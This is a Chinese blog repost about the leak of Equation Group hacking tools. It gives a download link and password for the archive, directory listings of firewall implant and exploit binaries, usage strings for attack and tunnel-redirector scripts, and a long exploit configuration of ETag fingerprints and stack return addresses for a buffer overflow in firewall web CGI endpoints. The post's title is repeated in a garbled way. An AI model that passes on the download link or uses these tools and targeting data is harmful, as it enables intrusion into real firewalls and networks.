方程式组织被黑 大量EXP流出

黑客界就是黑来黑去,近日有黑客声称黑进了方程式组织,并且正在拍卖偷来的 Exploits。这可以说是黑客界的原子弹军械库打开了~
今天知乎发现已经有人发了下载链接我原版附上:
压缩包下载 (解压密码: theequationgroup)
https://mega.nz/#!zEAU1AQL!oWJ63n-D6lCuCQ4AY0Cv_405hX8kn7MEsa1iLH5UjKU

后来找到了猪哥的分析结果,这里附上猪哥的分析:

泄露了两个压缩包,只有free-file的压缩包能解开,另外一个暂时没有密码(100个比特币):

$ ls -lah *.gpg
-rw-rw-r--@ 1 noname staff 128M 7 25 10:49 eqgrp-auction-file.tar.xz.gpg
-rw-rw-r--@ 1 noname staff 182M 7 25 10:50 eqgrp-free-file.tar.xz.gpg
free-file的文件主要涉及的内容是针对防火墙的扫描器、漏洞利用框架等等:
  • BLATSTING -- 穷举爆破
  • EXPLOITS -- 漏洞利用代码
  • OPS -- 攻击操作控制工具包
  • SCRIPTS -- 脚本资源引用库
  • TOOLS -- 辅助工具包(编码转换、IP格式转换、加密解密装换等等)

我们通过分析对应攻击payload的文件名,就能大致上猜测出来,具体哪些防火墙版本受到影响,比如下面这个信息,我们就能通过google搜索出思科的CISCO ASA5505防火墙受影响。

# find /Firewall/BANANAGLEE/BG3000/ .//Install/SCP/asa5505_clean60000.bin .//Install/SCP/asa5505_clean70000.bin .//Install/SCP/asa5505_cleanE18BF.bin .//Install/SCP/asa5505_cleanEC480.bin .//Install/SCP/asa5505_patch60000.bin .//Install/SCP/asa5505_patchE18BF.bin .//Install/SCP/asa5505_patchEC480.bin .//Install/SCP/asaGen_clean10000_biosVer114or115.bin .//Install/SCP/asaGen_clean20000_biosVer100or112.bin

Juniper NetScreen-ISG 2000 防火墙

# ls -lah ./Firewall/BARGLEE/BARGLEE3100/Install/LP
drwxr-xr-x 23 noname staff 782B 8 16 12:35 .
drwxr-xr-x 3 noname staff 102B 4 10 2010 ..
-rwxr-xr-x 1 noname staff 1.8M 6 11 2013 BARPUNCH-3110
-rwxr-xr-x 1 noname staff 2.4M 6 11 2013 BICE-3110
drwxr-xr-x 6 noname staff 204B 4 10 2010 Modules
-rwxr-xr-x 1 noname staff 1.7M 6 11 2013 SecondDateCommon-miniprog-3110
-rwxr-xr-x 1 noname staff 7.8K 6 11 2013 bg_redirect.pl-3110
-rwxr-xr-x 1 noname staff 431K 6 11 2013 bg_redirector-3110
-rwxr-xr-x 1 noname staff 1.9M 6 11 2013 cfMiniProg-3110
-rwxr-xr-x 1 noname staff 1.1M 6 11 2013 isg1000-moduledata-3113.tgz
-rwxr-xr-x 1 noname staff 996K 6 11 2013 isg2000-moduledata-3113.tgz
-rwxr-xr-x 1 noname staff 385K 6 11 2013 keygen-3110
-rwxr-xr-x 1 noname staff 285K 10 18 2013 maclist
-rwxr-xr-x 1 noname staff 1.7M 6 11 2013 nsLogMiniProg-3110
-rwxr-xr-x 1 noname staff 413K 6 11 2013 pd_create_ruleset-3110
-rwxr-xr-x 1 noname staff 1.9M 6 11 2013 pd_miniprog-3110
-rwxr-xr-x 1 noname staff 6.2K 6 11 2013 pd_start_pat.pl-3110
-rwxr-xr-x 1 noname staff 1.8M 6 11 2013 profilerIpv4-3100
-rwxr-xr-x 1 noname staff 29M 6 11 2013 ssg300-moduledata-3115.tgz
-rwxr-xr-x 1 noname staff 29M 6 11 2013 ssg500-moduledata-3115.tgz
-rwxr-xr-x 1 noname staff 13K 6 11 2013 start_redirector.pl-3110
-rwxr-xr-x 1 noname staff 42B 6 11 2013 stop_redirector.sh-3110
-rwxr-xr-x 1 noname staff 1.9M 6 11 2013 tunWiz-3110

同目录下是针对该防火墙的利用代码pl、sh,看选项带有attack_ip字眼,自己体会

# perl pd_start_pat.pl-3110 Usage: pd_start_pat.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file> [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number> --attack_ip <attack_ip> --intermediate_ip <intermediate_ip> --attack_int <interface> --target_int <interface> --port_offset <port offset> --trans_timeout <timeout> --pat_timeout <seconds> --attack_port <port> [--logdir <logdir>] [--help] # perl start_redirector.pl-3110 // 隧道攻击工具 Usage: start_redirector.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file> [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number> --local_ip <ip> --clr_tunnel_ip <ip> --enc_tunnel_ip <ip> --orig_src_ip <ip> --enc_redir_ip <ip> --clr_redir_ip <ip> --target_ip <ip> --enc_tunnel_pt <port> --enc_redir_pt <port> --enc_iface <interface number> --clr_iface <interface number> --enc_key <encryption key file> [--proto <protocol>] [--redir_to_target_dest_pt <port>] [--redir_to_target_src_pt <port>] [--target_to_redir_dest_pt <port>] [--target_to_redir_src_pt <port>] [--tunnel_to_attacker_dest_pt <port>] [--tunnel_to_attacker_src_pt <port>] [--restart] --timeout <seconds> [--logdir <logdir>] [--help]

方程式组织被黑 大量EXP流出

方程式组织被黑 大量EXP流出方程式组织被黑 大量EXP流出
################################ #
ETags from actual hardware
#################################
# tested
ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3
ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.001.050.1
ETAG = 596-583-47958bb3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.021.1
ETAG = 59a-583-47e0a4a8 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.030.1
ETAG = 641-5e7-494fd7a7 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.057.1
ETAG = 6e4-5e7-49c3697f : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.061.1
# added Dec. 2009 - WOBBLYLLAMA
ETAG = 55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003
# added Mar. 2010 - FLOCKFORWARD
ETAG = 6c6-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.066.1
# added Mar. 2010 - HIDDENTEMPLE
ETAG = 1065-569-44aa3cac : /cgi/maincgi.cgi?Url=Index : 0xbfffec70 : tos_3.2.8840.1
# added May. 2010 - CONTAINMENTGRID
ETAG = 83c-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : tos_3.3.005.066.1
#BLATSTING SUPPORT FOR ALL ABOVE
# added Sep. 2010 - GOTHAMKNIGHT
ETAG = 386f-569-46e895e3 : /cgi/maincgi.cgi?Url=Index : 0xbfffec40 : v3.2.100.010.8_pbc_27 ################################################################### #
BELOW IS FOR DEVELOPERS ONLY
###################################################################
# Etags and address from real hardware
#ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.2.100.010.1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.3.001.050.1
#ETAG = 596-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG = 59a-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG = 641-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG = 6e4-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG = 69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb40 : v3.3.005.061.1
# ETags and addresses from milliways
#ETAG = e8-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.2.100.010_1_pbc_17_iv_3 #ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.3.001.050.1
#ETAG = 55b-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG = 55f-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG = 600-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG = 69a-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG = e8-569-46b6b873 : /cgi/maincgi.cgi?Url=Index : 0xbfffec50 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb50 : v3.3.001.050.1
#ETAG = 55b-583-47958bb3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.021.1
#ETAG = 55f-583-47e0a4a8 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.030.1
#ETAG = 600-5e7-494fd7a7 : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.057.1
#ETAG = 69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.061.1 ###################################################################
# SCANPLAN format (dates are INCLUSIVE and written as hex values just like the third etag field):
# SCANPLAN = <action> : <min etag date> : <max etag date> : <comma-delimited list of addresses>
#Notes:
# - The full list of addresses must be all on one line.
# - SCANPLAN addresses CANNOT contain a null byte (00) - doing so will break the exploit's
# buffer overflow.
# - The --etag argument will be matched against the min/max dates of these scanplans. If more than
# one plan matches, they will be tried in the order they're listed in this file. If none match,
# the user will get an error to that effect.
# libc attacks - scan plan is simple (try them both)
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1 SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0
# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880
,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd
680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffcf80,0x7fffd280,0x
7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe48
0,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x494fd7a7 : 0xffffffff : 0x7fffcf80,0x7fffd280,0x7fffcc80
,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fff
e780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80,0xbfffeb80,0xbfffee80,0xb
fffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,
0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80,0x7fffd280,
0xbfffee80,0x7fffcc80,0xbfffe880,0x7fffd580,0xbffff180,0x7fffc980,0xbfffe580,0x7fffd880,0xbffff480,0x7fffc
680,0xbfffe280,0x7fffdb80,0xbffff780,0x7fffc380,0xbfffdf80,0x7fffde80,0xbffffa80,0x7fffe180,0xbfffdc80,0x7
fffe480,0xbfffd980,0x7fffe780,0xbfffd680,0x7fffea80,0xbfffd380,0x7fffed80,0xbfffd080,0x7ffff080,0xbfffcd8
0,0x7ffff380,0xbfffca80,0x7ffff680,0xbfffc780,0x7ffff980,0xbfffc480,0x7ffffc80,0xbfffc180
# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,
0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd6
80,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffeb80,0x7fffee80,0x7
fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0
x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x494fd7a7 : 0xffffffff : 0x7fffeb80,0x7fffee80,0x7fffe880,
0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd6
80,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180,0xbfffeb80,0xbfffee80,0xbf
ffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0
xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x487b260f : 0x494fd7a6 : 0xbfffeb80,0x7fffeb80,0xbfffee80,
0x7fffee80,0xbfffe880,0x7fffe880,0xbffff180,0x7ffff180,0xbfffe580,0x7fffe580,0xbffff480,0x7ffff480,0xbfffe2
80,0x7fffe280,0xbffff780,0x7ffff780,0xbfffdf80,0x7fffdf80,0xbffffa80,0x7ffffa80,0xbfffdc80,0x7fffdc80,0xbfff
d980,0x7fffd980,0xbfffd680,0x7fffd680,0xbfffd380,0x7fffd380,0xbfffd080,0x7fffd080,0xbfffcd80,0x7fffcd80,
0xbfffca80,0x7fffca80,0xbfffc780,0x7fffc780,0xbfffc480,0x7fffc480,0xbfffc180,0x7fffc180

方程式组织被黑 大量EXP流出
知识来源*https://www.zhihu.com/question/49658687
转载请附带链接并注明来自404安全(404.so)